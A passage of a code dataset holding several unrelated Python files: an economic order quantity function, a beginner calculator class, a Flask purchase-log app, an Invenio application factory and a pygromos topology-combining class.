economic order quantity model.\n Operations Research, 38(6), 937–946.\n\n .. [W2020] Economic order quantity. (2020, April 3). In Wikipedia.\n Retrieved from\n `https://en.wikipedia.org/w/index.php\\\n ?title=Economic_order_quantity&oldid=948881557 `_\n\n Examples\n --------\n\n >>> x = [1, 2, 3]\n >>> y = eoq_model(x, r=0.1)\n >>> np.testing.assert_almost_equal(y, 18.973665961010276)\n \"\"\"\n\n m, c, s = x\n y = np.sqrt((24 * m * s) / (r * c))\n\n return y\n\n\ndef simple_linear_function(x):\n r\"\"\"Simple linear function.\n\n This function computes the sum of all elements of a given array.\n\n Parameters\n ----------\n x : array_like\n Array of summands\n\n Examples\n --------\n\n >>> x = [1, 2, 3]\n >>> y = simple_linear_function(x)\n >>> np.testing.assert_almost_equal(y, 6)\n \"\"\"\n return sum(x)\n","sub_path":"temfpy/uncertainty_quantification.py","file_name":"uncertainty_quantification.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"282552197","text":"class calculadora:\n \n color = \"blanco\"\n Modelo = \"2020\"\n tipo = \"solar\"\n Marca = \"casio\"\n pantalla=\"chica\"\n\n def __init__(self):\n print(\"constructor calculadora \")\n \n def sumar (self):\n print(\"sumar\")\n\n def restar (self): \n print(\"restar\")\n\nclass calcusolar (calculadora):\n def __init__(self):\n print(\"constructor de calculadora solar\") \n\n def restar (self): \n print(\"restar valores\") \n\nobjeto = calculadora() \nobjeto.sumar()\nobjeto.restar()\nobjeto_solar = calcusolar()\nobjeto_solar.sumar()\nobjeto_solar.restar()\nprint(objeto_solar.color)\nprint(objeto_solar.Modelo)\nprint(objeto_solar.tipo)\nprint(objeto_solar.Marca)\nprint(objeto_solar.pantalla)","sub_path":"semana_4/programa_8.py","file_name":"programa_8.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"444840384","text":"from app import app\nfrom flask import render_template, request, redirect, url_for, flash\nimport csv\nfrom os import remove, rename\nfrom app.forms import CompraForm\n\nficheromovimientos = 'data/movimientos.txt'\nficheronuevo = 'data/nuevomovimientos.txt'\n@app.route('/')\ndef index():\n #leer movimientos\n fMovimientos = open(ficheromovimientos, \"r\")\n csvreader = csv.reader(fMovimientos, delimiter=',', quotechar='\"')\n movements = []\n for movimiento in csvreader: \n movements.append(movimiento)\n #enviar movimientos a index.html\n return render_template('index.html', movimientos=movements)\n\n@app.route('/nuevacompra', methods=['GET', 'POST'])\ndef compra():\n print(request.method)\n form = CompraForm(request.form)\n\n if request.method == 'GET':\n return render_template('nuevacompra.html')\n return render_template('nuevacompra.html', form=form)\n else:\n msg = validar(request.values)\n if msg != True:\n return render_template('nuevacompra.html', errores=msg)\n fMovimientos = open(ficheromovimientos, \"a+\")\n precioUnitario = float(request.values['cantidadPagada'])/float(request.values['cantidadComprada'])\n registro = '{},\"{}\",{},{},{},{},{}\\n'.format(request.values['fecha'], \n request.values['concepto'], \n request.values['monedaComprada'], \n request.values['cantidadComprada'], \n request.values['monedaPagada'], \n request.values['cantidadPagada'], \n precioUnitario)\n fMovimientos.write(registro)\n fMovimientos.close()\n return redirect(url_for('index'))\n@app.route('/modificar', methods=['GET', 'POST'])\ndef update():\n \n if request.method == 'GET':\n if request.values.get('ix'):\n movimiento, ix = recuperarregistro(request.values.get('ix'))\n return render_template('update.html', registro_seleccionado=movimiento, ix=ix)\n else:\n if request.values.get('ix'):\n msg = validar(request.values)\n if msg != True:\n registro_seleccionado = [\n request.values['fecha'],\n request.values['concepto'],\n request.values['monedaComprada'],\n request.values['cantidadComprada'],\n request.values['monedaPagada'],\n request.values['cantidadPagada']\n ]\n return render_template('update.html', registro_seleccionado=registro_seleccionado, ix=request.values['ix'], errores=msg)\n \n modificarregistro(request.values)\n return redirect(url_for('index'))\n # recuperar los values\n #grabarlos en la posición adecuada del fichero sustituyendo al registro original (el 3)\n@app.route('/procesarregistro', methods=['POST'])\ndef procesar():\n if request.values.get('ix'):\n if request.values['btnselected'] == 'Borrar':\n borrar(int(request.values['ix']))\n else:\n #modificar(int(request.values['ix']))\n return redirect(url_for('update', ix=request.values['ix']))\n return redirect(url_for('index'))\ndef recuperarregistro(ix):\n ix = int(ix)\n fe = open(ficheromovimientos, 'r')\n csvreader = csv.reader(fe, delimiter=',', quotechar='\"')\n contador = 1\n for linea in csvreader:\n if contador == ix:\n fe.close()\n return linea, ix\n contador += 1\n fe.close()\n \ndef modificarregistro(values):\n fe = open(ficheromovimientos, 'r')\n fs = open(ficheronuevo, 'w')\n ix = int(values.get('ix'))\n precioUnitario = float(values['cantidadPagada'])/float(values['cantidadComprada'])\n registro = '{},\"{}\",{},{},{},{},{}\\n'.format(values['fecha'], \n values['concepto'], \n values['monedaComprada'], \n values['cantidadComprada'], \n values['monedaPagada'], \n values['cantidadPagada'], \n precioUnitario)\n contador = 1\n for linea in fe:\n if contador == ix:\n linea = registro\n fs.write(linea)\n contador += 1\n fe.close()\n fs.close()\n remove(ficheromovimientos)\n rename(ficheronuevo, ficheromovimientos)\n \ndef borrar(ix):\n fe = open(ficheromovimientos, 'r')\n fs = open(ficheronuevo, 'w')\n contador = 1\n for linea in fe:\n if contador != ix:\n fs.write(linea)\n contador += 1\n fe.close()\n fs.close()\n remove(ficheromovimientos)\n rename(ficheronuevo, ficheromovimientos)\ndef validar(values):\n errores = []\n if values['fecha'] == '':\n errores.append('Debe informar la fecha')\n \n if values['concepto'] == '':\n errores.append('Debe informar el concepto')\n if values['cantidadComprada'] == '':\n errores.append('Debe informar la cantidad comprada')\n if values['cantidadPagada'] == '':\n errores.append('Debe informar la cantidad pagada') \n if len(errores) == 0:\n return True\n else:\n return errores ","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"425322317","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Invenio.\n# Copyright (C) 2017-2018 CERN.\n#\n# Invenio is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Flask application factories for Invenio flavours.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport os\nimport sys\n\nimport pkg_resources\nfrom invenio_base.app import create_app_factory\nfrom invenio_base.wsgi import create_wsgi_factory, wsgi_proxyfix\nfrom invenio_cache import BytecodeCache\nfrom invenio_config import create_config_loader\nfrom jinja2 import ChoiceLoader, FileSystemLoader\n\nfrom .helpers import TrustedHostsMixin\n\nenv_prefix = 'INVENIO'\n\ninvenio_config_loader = create_config_loader(\n config=None, env_prefix=env_prefix\n)\n\ninstance_path = os.getenv(env_prefix + '_INSTANCE_PATH') or \\\n os.path.join(sys.prefix, 'var', 'instance')\n\"\"\"Instance path for Invenio.\n\nDefaults to ``_INSTANCE_PATH`` or if environment variable is not\nset ``/var/instance``.\n\"\"\"\n\nstatic_folder = os.getenv(env_prefix + '_STATIC_FOLDER') or \\\n os.path.join(instance_path, 'static')\n\"\"\"Static folder path.\n\nDefaults to ``_STATIC_FOLDER`` or if environment variable is not\nset ``/var/instance/static``.\n\"\"\"\n\n\ndef config_loader(app, **kwargs_config):\n \"\"\"Configuration loader.\n\n Adds support for loading templates from the Flask application's instance\n folder (``/templates``).\n \"\"\"\n # This is the only place customize the Flask application right after\n # it has been created, but before all extensions etc are loaded.\n local_templates_path = os.path.join(app.instance_path, 'templates')\n if os.path.exists(local_templates_path):\n # Let's customize the template loader to look into packages\n # and application templates folders.\n app.jinja_loader = ChoiceLoader([\n FileSystemLoader(local_templates_path),\n app.jinja_loader,\n ])\n\n app.jinja_options = dict(\n app.jinja_options,\n cache_size=1000,\n bytecode_cache=BytecodeCache(app)\n )\n\n invenio_config_loader(app, **kwargs_config)\n\n\ndef app_class():\n \"\"\"Create Flask application class.\n\n Invenio-Files-REST needs to patch the Werkzeug form parsing in order to\n support streaming large file uploads. This is done by subclassing the Flask\n application class.\n \"\"\"\n try:\n pkg_resources.get_distribution('invenio-files-rest')\n from invenio_files_rest.app import Flask as FlaskBase\n except pkg_resources.DistributionNotFound:\n from flask import Flask as FlaskBase\n\n # Add Host header validation via APP_ALLOWED_HOSTS configuration variable.\n class Request(TrustedHostsMixin, FlaskBase.request_class):\n pass\n\n class Flask(FlaskBase):\n request_class = Request\n\n return Flask\n\n\ncreate_api = create_app_factory(\n 'invenio',\n config_loader=config_loader,\n blueprint_entry_points=['invenio_base.api_blueprints'],\n extension_entry_points=['invenio_base.api_apps'],\n converter_entry_points=['invenio_base.api_converters'],\n wsgi_factory=wsgi_proxyfix(),\n instance_path=instance_path,\n app_class=app_class(),\n)\n\"\"\"Flask application factory for Invenio REST API.\"\"\"\n\ncreate_ui = create_app_factory(\n 'invenio',\n config_loader=config_loader,\n blueprint_entry_points=['invenio_base.blueprints'],\n extension_entry_points=['invenio_base.apps'],\n converter_entry_points=['invenio_base.converters'],\n wsgi_factory=wsgi_proxyfix(),\n instance_path=instance_path,\n static_folder=static_folder,\n app_class=app_class(),\n)\n\"\"\"Flask application factory for Invenio UI.\"\"\"\n\ncreate_app = create_app_factory(\n 'invenio',\n config_loader=config_loader,\n blueprint_entry_points=['invenio_base.blueprints'],\n extension_entry_points=['invenio_base.apps'],\n converter_entry_points=['invenio_base.converters'],\n wsgi_factory=wsgi_proxyfix(create_wsgi_factory({'/api': create_api})),\n instance_path=instance_path,\n static_folder=static_folder,\n app_class=app_class(),\n)\n\"\"\"Flask application factory for combined UI + REST API.\n\nREST API is mounted under ``/api``.\n\"\"\"\n","sub_path":"invenio_app/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"331187705","text":"\"\"\"\nFile: gromos++ topo file functions\nWarnings: this CLASS IS NOT IMPLEMENTED!\nTODO:REWORK\nDescription:\n in this lib, gromos topo file mainpulating functions are gathered\nAuthor: Marc Lehner, Benjamin Ries\n\"\"\"\n\n#imports\nfrom copy import deepcopy\nfrom typing import TypeVar, Union\nimport warnings\nimport math\n\nfrom pygromos.utils import bash as bash\nfrom pygromos.files._basics import _general_gromos_file, parser\nfrom pygromos.files.blocks import topology_blocks as blocks\n\n\nTopType = TypeVar(\"Top\")\n\n\n#functions\ndef make_topolog(input_arg, build, param, seq, solve=\"H2O\"):\n #define python command\n command=\"make_top \"+input_arg+\" \"+param+\" \"+seq+\" \"+solve+\" \\n\"\n\n #execute command\n try:\n bash.execute(command=command)\n except Exception as err:\n bash.increment_error_level(err_prefix=\"Could not make_topology due to: \", old_err=err)\n\n return command\n\ndef combine_topologies():\n raise Exception('not implemented yet!')\n\ndef check_top():\n raise Exception('not implemented yet!')\n\n#file Classes\nclass Top(_general_gromos_file._general_gromos_file):\n gromos_file_ending:str = \"top\"\n\n def __init__(self, in_value:(str or dict or None or TopType), _future_file:bool=False):\n if type(in_value) is str:\n super().__init__(in_value=in_value, _future_file=_future_file)\n elif(in_value == None):\n self.path = \"\"\n self.block_names = {}\n super().__init__(in_value=None)\n\n elif(type(in_value) is __class__):\n raise Exception('not implemented yet!')\n else:\n raise Exception('not implemented yet!')\n\n def __add__(self, top:TopType)->TopType:\n return self._add_top(top=top)\n\n def _add_top(self, top:Union[TopType, None], solvFrom1:bool=True, verbose:bool=False)->TopType:\n \"\"\"\n combines two topologies. Parameters are taken from the initial topology. \n But missing parameters from the second topology will be added.\n Can be used like com_top from Gromos++ \n\n Parameters\n ----------\n top : TopType\n second topology to add to the first topology\n solvFrom1 : bool, optional\n should the solvent be taken from the first topology? (else second), by default True\n verbose : bool, optional\n extra print statements, by default True\n sanityCheck : bool, optional\n feature and compatibility check, by default True\n\n Returns\n -------\n TopType\n returns a topology made by combing two topologies\n \"\"\"\n # create the return top\n retTop = deepcopy(self)\n if top is None:\n return retTop\n # add solv\n if not solvFrom1:\n if verbose: print(\"taking solvent from second topology\")\n retTop.SOLVENTATOM = top.SOLVENTATOM\n retTop.SOLVENTCONSTR = top.SOLVENTCONSTR\n\n #calculate the shift of atom types of the second topology and add new atomtypes\n atomTypeShift = {}\n if not (hasattr(retTop, \"ATOMTYPENAME\") and len(retTop.ATOMTYPENAME.content)>=2):\n setattr(retTop, \"ATOMTYPENAME\", deepcopy(top.ATOMTYPENAME))\n setattr(retTop, \"LJPARAMETERS\", deepcopy(top.LJPARAMETERS))\n for idx, atomT in enumerate(top.ATOMTYPENAME.content[1:]): #new atomtypes to find names for\n foundAtomType = False\n for mainIdx, mainAtomT in enumerate(retTop.ATOMTYPENAME.content[1:]): #AtomTypes in self to match against\n if atomT == mainAtomT: \n foundAtomType = True\n atomTypeShift.update({idx+1:mainIdx+1})\n break\n if not foundAtomType:\n retTop.ATOMTYPENAME.content[0][0] = str(int(retTop.ATOMTYPENAME.content[0][0]) + 1)\n retTop.ATOMTYPENAME.content.append(atomT)\n atomTypeShift.update({idx+1:retTop.ATOMTYPENAME.content[0][0]})\n ljType = top.get_LJparameter_from_IAC(IAC=idx+1)\n retTop.add_new_LJparameter(C6=float(ljType.C6), C12=float(ljType.C12))\n\n if verbose: print(\"atomTypeShift: \" + str(atomTypeShift))\n\n #add RESNAME\n for resname in top.RESNAME.content[1:]:\n retTop.add_new_resname(resname[0])\n\n #add SOLUTEATOM\n if hasattr(retTop, \"SOLUTEATOM\"):\n atnmShift = retTop.SOLUTEATOM.content[-1].ATNM #Number of atoms found in main top. Shift secondary top atoms accordingly\n mresShift = retTop.SOLUTEATOM.content[-1].MRES #Number of molecules found in main top.\n else:\n atnmShift=0\n mresShift=0\n if verbose: print(\"atom number shift: \" + str(atnmShift))\n if verbose: print(\"molecule number shift: \" + str(mresShift))\n\n for atom in top.SOLUTEATOM.content:\n retTop.add_new_soluteatom(ATNM = atnmShift + atom.ATNM,\n MRES = mresShift + atom.MRES,\n PANM = atom.PANM,\n IAC = atomTypeShift[atom.IAC],\n MASS = atom.MASS,\n CG = atom.CG,\n CGC = atom.CGC,\n INE = [str(int(x)+atnmShift) for x in atom.INEvalues],\n INE14 = [str(int(x)+atnmShift) for x in atom.INE14values])\n\n # add bonds and bonds with H\n for bond in top.BOND.content:\n bondType = top.BONDSTRETCHTYPE.content[bond.ICB - 1]\n retTop.add_new_bond(k=bondType.CHB, \n b0=bondType.B0, \n atomI=bond.IB + atnmShift, \n atomJ=bond.JB + atnmShift)\n for bond in top.BONDH.content:\n bondType = top.BONDSTRETCHTYPE.content[bond.ICB - 1]\n retTop.add_new_bond(k=bondType.CHB, \n b0=bondType.B0, \n atomI=bond.IB + atnmShift, \n atomJ=bond.JB + atnmShift,\n includesH=True)\n\n # add angles and angles with H\n for angle in top.BONDANGLE.content:\n angleType = top.BONDANGLEBENDTYPE.content[angle.ICT - 1]\n retTop.add_new_angle(k=angleType.CB, \n kh=angleType.CHB, \n b0=angleType.B0, \n atomI=angle.IT + atnmShift, \n atomJ=angle.JT + atnmShift,\n atomK=angle.KT + atnmShift)\n for angle in top.BONDANGLEH.content:\n angleType = top.BONDANGLEBENDTYPE.content[angle.ICT - 1]\n retTop.add_new_angle(k=angleType.CB, \n kh=angleType.CHB, \n b0=angleType.B0, \n atomI=angle.IT + atnmShift, \n atomJ=angle.JT + atnmShift,\n atomK=angle.KT + atnmShift, includesH=True)\n\n # add diheadrals and diheadrals with H\n for dihdrl in top.DIHEDRAL.content:\n dihdrlType = top.TORSDIHEDRALTYPE.content[dihdrl.ICP - 1]\n retTop.add_new_torsiondihedral(CP=dihdrlType.CP, \n PD=dihdrlType.PD, \n NP=dihdrlType.NP, \n atomI=dihdrl.IP + atnmShift, \n atomJ=dihdrl.JP + atnmShift, \n atomK=dihdrl.KP + atnmShift, \n atomL=dihdrl.LP + atnmShift)\n for dihdrl in top.DIHEDRALH.content:\n dihdrlType = top.TORSDIHEDRALTYPE.content[dihdrl.ICPH - 1]\n retTop.add_new_torsiondihedral(CP=dihdrlType.CP, \n PD=dihdrlType.PD, \n NP=dihdrlType.NP, \n atomI=dihdrl.IPH + atnmShift, \n atomJ=dihdrl.JPH + atnmShift, \n atomK=dihdrl.KPH + atnmShift, \n atomL=dihdrl.LPH + atnmShift,\n includesH=True)\n\n # add impdihedrals with and without H\n for dihdrl in top.IMPDIHEDRAL.content:\n dihdrlType = top.IMPDIHEDRALTYPE.content[dihdrl.ICQ - 1]\n retTop.add_new_impdihedral(CQ=dihdrlType.CQ, \n Q0=dihdrlType.Q0,\n atomI=dihdrl.IQ + atnmShift, \n atomJ=dihdrl.JQ + atnmShift, \n atomK=dihdrl.KQ + atnmShift, \n atomL=dihdrl.LQ + atnmShift)\n for dihdrl in top.IMPDIHEDRALH.content:\n dihdrlType = top.IMPDIHEDRALTYPE.content[dihdrl.ICQH - 1]\n retTop.add_new_torsiondihedral(CQ=dihdrlType.CQ, \n Q0=dihdrlType.Q0, \n atomI=dihdrl.IQH + atnmShift, \n atomJ=dihdrl.JQH + atnmShift, \n atomK=dihdrl.KQH + atnmShift, \n atomL=dihdrl.LQH + atnmShift,\n includesH=True)\n\n # add SOLUTEMOLECULES\n for solmol in top.SOLUTEMOLECULES.content[1:]:\n retTop.add_new_SOLUTEMOLECULES(number=str(int(solmol[0]) + atnmShift))\n\n # add TEMPERATUREGROUPS\n for solmol in top.TEMPERATUREGROUPS.content[1:]:\n retTop.add_new_TEMPERATUREGROUPS(number=str(int(solmol[0]) + atnmShift))\n\n # add PRESSUREGROUPS\n for solmol in top.PRESSUREGROUPS.content[1:]:\n retTop.add_new_PRESSUREGROUPS(number=str(int(solmol[0]) + atnmShift))\n\n return retTop\n\n def read_file(self):\n #Read blocks to string\n data = parser.read_general_gromos_file(self._orig_file_path)\n\n #translate the string subblocks\n blocks = {}\n for block_title in data:\n #print(block_title)\n self.add_block(blocktitle=block_title, content=data[block_title])\n blocks.update({block_title: self.__getattribute__(block_title)})\n return blocks\n\n def make_ordered(self, orderList:list=None):\n if orderList:\n self._block_order = orderList\n else:\n self._block_order = [\"TITLE\", \"PHYSICALCONSTANTS\",\"TOPVERSION\",\"ATOMTYPENAME\",\"RESNAME\",\"SOLUTEATOM\",\"BONDSTRETCHTYPE\",\"BONDH\",\"BOND\",\"BONDANGLEBENDTYPE\",\"BONDANGLEH\",\"BONDANGLE\",\"IMPDIHEDRALTYPE\",\"IMPDIHEDRALH\",\"IMPDIHEDRAL\",\"TORSDIHEDRALTYPE\",\"DIHEDRALH\",\"DIHEDRAL\",\"CROSSDIHEDRALH\",\"CROSSDIHEDRAL\",\"LJPARAMETERS\",\"SOLUTEMOLECULES\",\"TEMPERATUREGROUPS\",\"PRESSUREGROUPS\",\"LJEXCEPTIONS\",\"SOLVENTATOM\",\"SOLVENTCONSTR\"]\n\n def get_num_atomtypes(self) -> int:\n if not hasattr(self, \"ATOMTYPENAME\"):\n return 0\n else:\n return int(self.ATOMTYPENAME.content[0][0])\n\n def add_new_atomtype(self, name:str, verbose=False):\n if not hasattr(self, \"ATOMTYPENAME\"):\n defaultContent=['0', 'Dummy']\n self.add_block(blocktitle=\"ATOMTYPENAME\", content=defaultContent, verbose=verbose)\n self.ATOMTYPENAME.content.append([name])\n self.ATOMTYPENAME.content.remove(['Dummy'])\n else:\n if len(self.ATOMTYPENAME.content) < 1:\n self.ATOMTYPENAME.content.append([\"0\"])\n self.ATOMTYPENAME.content.append([name])\n self.ATOMTYPENAME.content[0][0] = str(int(self.ATOMTYPENAME.content[0][0])+1)\n\n def add_new_resname(self, name:str, verbose=False):\n if not hasattr(self, \"RESNAME\"):\n defaultContent=['0', 'Dummy']\n self.add_block(blocktitle=\"RESNAME\", content=defaultContent, verbose=verbose)\n self.RESNAME.content.append([name])\n self.RESNAME.content.remove(['Dummy'])\n else:\n if len(self.RESNAME.content) < 1:\n self.RESNAME.content.append([\"0\"])\n self.RESNAME.content.append([name])\n self.RESNAME.content[0][0] = str(int(self.RESNAME.content[0][0])+1)\n\n def add_new_soluteatom(self, ATNM:int=0, MRES:int=0, PANM:str=\"\", IAC:int=0, MASS:float=0, CG:float=0, CGC:int=0, INE:list=[], INE14:list=[], verbose=False):\n if not hasattr(self, \"SOLUTEATOM\"):\n self.add_block(blocktitle=\"SOLUTEATOM\", content=[], verbose=verbose)\n self.SOLUTEATOM.NRP = 0\n # some auto set methods\n if ATNM == 0:\n ATNM = len(self.SOLUTEATOM.content) + 1\n if MRES == 0:\n if len(self.SOLUTEATOM.content) >= 1:\n MRES = self.SOLUTEATOM.content[-1].MRES + 1\n else:\n MRES = 1\n #create new entry\n entry = blocks.soluteatom_type(ATNM=ATNM, MRES=MRES, PANM=PANM, IAC=IAC, MASS=MASS, CG=CG, CGC=CGC, INE=len(INE), INEvalues=INE, INE14=len(INE14), INE14values=INE14)\n self.SOLUTEATOM.content.append(entry)\n self.SOLUTEATOM.NRP += 1\n\n\n def add_new_bond(self, k:float, b0:float, atomI:int, atomJ:int, includesH:bool = False, verbose=False):\n #check if all classes are ready, if not create\n if not hasattr(self, \"BONDSTRETCHTYPE\"):\n self.add_block(blocktitle=\"BONDSTRETCHTYPE\", content=list(), verbose=verbose)\n if includesH:\n if not hasattr(self, \"BONDH\"):\n self.add_block(blocktitle=\"BONDH\", content=list(), verbose=verbose)\n else:\n if not hasattr(self, \"BOND\"):\n self.add_block(blocktitle=\"BOND\", content=list(), verbose=verbose)\n \n \n # find the bondstretchtype number or create new bondstretchtype\n # TODO: add quartic force (CB)\n bond_type_number = 0\n iterator = 1\n quartic = k/(2*(b0**2))\n newBondStretchType = blocks.bondstretchtype_type(CB=quartic, CHB=k, B0=b0)\n for bond_type in self.BONDSTRETCHTYPE.content:\n if bond_type.CHB == newBondStretchType.CHB and bond_type.B0 == newBondStretchType.B0:\n break\n else:\n iterator += 1\n bond_type_number = iterator\n if iterator > len(self.BONDSTRETCHTYPE.content):#bond type was not found -> add new bondtype\n self.BONDSTRETCHTYPE.content.append(newBondStretchType)\n self.BONDSTRETCHTYPE.NBTY += 1\n\n #create new bond TODO: maybe check if already exists. But I will asume smart users\n newBond = blocks.top_bond_type(IB=atomI, JB=atomJ, ICB=bond_type_number)\n\n #check if we are adding a bond to BOND or BONDH\n if includesH:\n self.BONDH.content.append(newBond)\n self.BONDH.NBONH += 1\n else:\n self.BOND.content.append(newBond)\n self.BOND.NBON += 1\n\n def add_new_angle(self, k:float, kh:float, b0:float, atomI:int, atomJ:int, atomK:int, includesH:bool = False, verbose=False):\n #check if all classes are ready, if not create\n if not hasattr(self, \"BONDANGLEBENDTYPE\"):\n self.add_block(blocktitle=\"BONDANGLEBENDTYPE\", content=[], verbose=verbose)\n if includesH:\n if not hasattr(self, \"BONDANGLEH\"):\n self.add_block(blocktitle=\"BONDANGLEH\", content=[], verbose=verbose)\n else:\n if not hasattr(self, \"BONDANGLE\"):\n self.add_block(blocktitle=\"BONDANGLE\", content=[], verbose=verbose)\n \n # find the BONDANGLEBENDTYPE number or create new BONDANGLEBENDTYPE\n # TODO: add harmonic in the angle cosine force (CT)\n angle_type_number = 0\n iterator = 1\n for angle_type in self.BONDANGLEBENDTYPE.content:\n if angle_type.CB == k and angle_type.B0 == b0:\n break\n else:\n iterator += 1\n angle_type_number = iterator\n if iterator > len(self.BONDANGLEBENDTYPE.content):#angle type was not found -> add new bondtype\n newBONDANGLEBENDTYPE = blocks.bondstretchtype_type(CB=k, CHB=kh, B0=b0)\n self.BONDANGLEBENDTYPE.content.append(newBONDANGLEBENDTYPE)\n self.BONDANGLEBENDTYPE.NBTY += 1\n \n #create new angle TODO: maybe check if already exists. But I will asume smart users\n newAngle = blocks.bondangle_type(IT=atomI, JT=atomJ, KT=atomK, ICT=angle_type_number)\n #check if we are adding a bond to BONDANGLE or BONDANGLEH\n if includesH:\n self.BONDANGLEH.content.append(newAngle)\n self.BONDANGLEH.NTHEH += 1\n else:\n self.BONDANGLE.content.append(newAngle)\n self.BONDANGLE.NTHE += 1\n\n def add_new_torsiondihedral(self, CP:float, PD:float, NP:int, atomI:int, atomJ:int, atomK:int, atomL:int, includesH:bool = False, verbose=False):\n #check if all classes are ready, if not create\n if not hasattr(self, \"TORSDIHEDRALTYPE\"):\n self.add_block(blocktitle=\"TORSDIHEDRALTYPE\", content=[], verbose=verbose)\n if includesH:\n if not hasattr(self, \"DIHEDRALH\"):\n self.add_block(blocktitle=\"DIHEDRALH\", content=[], verbose=verbose)\n else:\n if not hasattr(self, \"DIHEDRAL\"):\n self.add_block(blocktitle=\"DIHEDRAL\", content=[], verbose=verbose)\n \n # find the TORSDIHEDRALTYPE number or create new TORSDIHEDRALTYPE\n torsion_type_number = 0\n iterator = 1\n for torsion_type in self.TORSDIHEDRALTYPE.content:\n if torsion_type.CP == CP and torsion_type.PD == PD and torsion_type.NP == NP:\n break\n else:\n iterator += 1\n torsion_type_number = iterator #found the torsion\n if iterator > len(self.TORSDIHEDRALTYPE.content):#torsion type was not found -> add new bondtype\n newTORSDIHEDRALTYPE = blocks.torsdihedraltype_type(CP=CP, PD=PD, NP=NP)\n self.TORSDIHEDRALTYPE.content.append(newTORSDIHEDRALTYPE)\n self.TORSDIHEDRALTYPE.NPTY += 1\n \n #check if we are adding a bond to DIHEDRAL or DIHEDRALH\n if includesH:\n self.DIHEDRALH.content.append(blocks.dihedralh_type(IPH=atomI, JPH=atomJ, KPH=atomK, LPH=atomL, ICPH=torsion_type_number))\n self.DIHEDRALH.NPHIH += 1\n else:\n self.DIHEDRAL.content.append(blocks.top_dihedral_type(IP=atomI, JP=atomJ, KP=atomK, LP=atomL, ICP=torsion_type_number))\n self.DIHEDRAL.NPHI += 1\n\n \n def add_new_impdihedral_type(self, CQ:float, Q0:float, verbose=False):\n #check if all classes are ready, if not create\n if not hasattr(self, \"IMPDIHEDRALTYPE\"):\n self.add_block(blocktitle=\"IMPDIHEDRALTYPE\", content=[], verbose=verbose)\n newIMPDIHEDRALTYPE = blocks.impdihedraltype_type(CQ=CQ, Q0=Q0)\n self.IMPDIHEDRALTYPE.content.append(newIMPDIHEDRALTYPE)\n self.IMPDIHEDRALTYPE.NQTY += 1\n\n\n def add_new_impdihedral(self, CQ:float, Q0:float, atomI:int, atomJ:int, atomK:int, atomL:int, includesH:bool = False, verbose=False):\n #check if all classes are ready, if not create\n if not hasattr(self, \"IMPDIHEDRALTYPE\"):\n self.add_block(blocktitle=\"IMPDIHEDRALTYPE\", content=[], verbose=verbose)\n if includesH:\n if not hasattr(self, \"IMPDIHEDRALH\"):\n self.add_block(blocktitle=\"IMPDIHEDRALH\", content=[], verbose=verbose)\n else:\n if not hasattr(self, \"IMPDIHEDRAL\"):\n self.add_block(blocktitle=\"IMPDIHEDRAL\", content=[], verbose=verbose)\n \n # find the IMPDIHEDRALTYPE number or create new IMPDIHEDRALTYPE\n impdihedral_type_number = 1\n iterator = 1\n for imp_type in self.IMPDIHEDRALTYPE.content:\n if imp_type.CQ == CQ and imp_type.Q0 == Q0:\n break\n else:\n iterator += 1\n impdihedral_type_number = iterator #found the torsion\n if iterator > len(self.IMPDIHEDRALTYPE.content):#torsion type was not found -> add new bondtype\n self.add_new_impdihedral_type(CQ=CQ, Q0=Q0)\n \n #check if we are adding a bond to IMPDIHEDRALH or IMPDIHEDRALH\n if includesH:\n self.IMPDIHEDRALH.content.append(blocks.impdihedralh_type(IQH=atomI, JQH=atomJ, KQH=atomK, LQH=atomL, ICQH=impdihedral_type_number))\n self.IMPDIHEDRALH.NQHIH += 1\n else:\n self.IMPDIHEDRAL.content.append(blocks.impdihedral_type(IQ=atomI, JQ=atomJ, KQ=atomK, LQ=atomL, ICQ=impdihedral_type_number))\n self.IMPDIHEDRAL.NQHI += 1\n\n\n #TODO: add implementation\n def add_new_crossdihedral(self, verbose=False):\n raise NotImplementedError(\"Who needs this???? Could you plox implement it. UwU\")\n\n def add_new_LJparameter(self, C6:float, C12:float, CS6:float=0, CS12:float=0, combination_rule:str=\"geometric\", verbose=False, AddATOMTYPENAME:str=None, lowerBound:float=1e-100):\n if not hasattr(self, \"LJPARAMETERS\"):\n self.add_block(blocktitle=\"LJPARAMETERS\", content=[], verbose=verbose)\n self.LJPARAMETERS.NRATT2 = 0\n #safety\n if C6 < lowerBound:\n C6 = lowerBound\n if C12 < lowerBound:\n C12 = lowerBound\n if CS6 < lowerBound:\n CS6 = lowerBound\n if CS12 < lowerBound:\n CS12 = lowerBound\n # add LJ parameter for all existing combinations\n num=0\n nratt=int((math.sqrt(8*self.LJPARAMETERS.NRATT2+1)-1)/2)\n for i in range(nratt):\n if combination_rule == \"geometric\":\n c6 = math.sqrt(float(C6 * self.LJPARAMETERS.content[num].C6))\n c12 = math.sqrt(float(C12 * self.LJPARAMETERS.content[num].C12))\n cs6 = math.sqrt(float(CS6 * self.LJPARAMETERS.content[num].CS6))\n cs12 = math.sqrt(float(CS12 * self.LJPARAMETERS.content[num].CS12))\n else:\n raise NotImplementedError(\"Error in add_new_LJparameter: desired combination rule not implemented\")\n add = blocks.ljparameters_type(IAC=i+1, JAC=nratt+1, C6=c6, C12=c12, CS12=cs12, CS6=cs6)\n self.LJPARAMETERS.append(add)\n num += i+2\n #add new LJ paramter to self\n add = blocks.ljparameters_type(IAC=nratt+1, JAC=nratt+1, C6=C6, C12=C12, CS12=CS12, CS6=CS6)\n self.LJPARAMETERS.append(add)\n self.LJPARAMETERS.NRATT2 += nratt + 1\n \n if AddATOMTYPENAME != None:\n if not hasattr(self, \"ATOMTYPENAME\"):\n self.add_block(blocktitle=\"ATOMTYPENAME\", content=[], verbose=verbose)\n self.LJPARAMETERS.NRATT = 0\n self.add_new_atomtype(AddATOMTYPENAME)\n 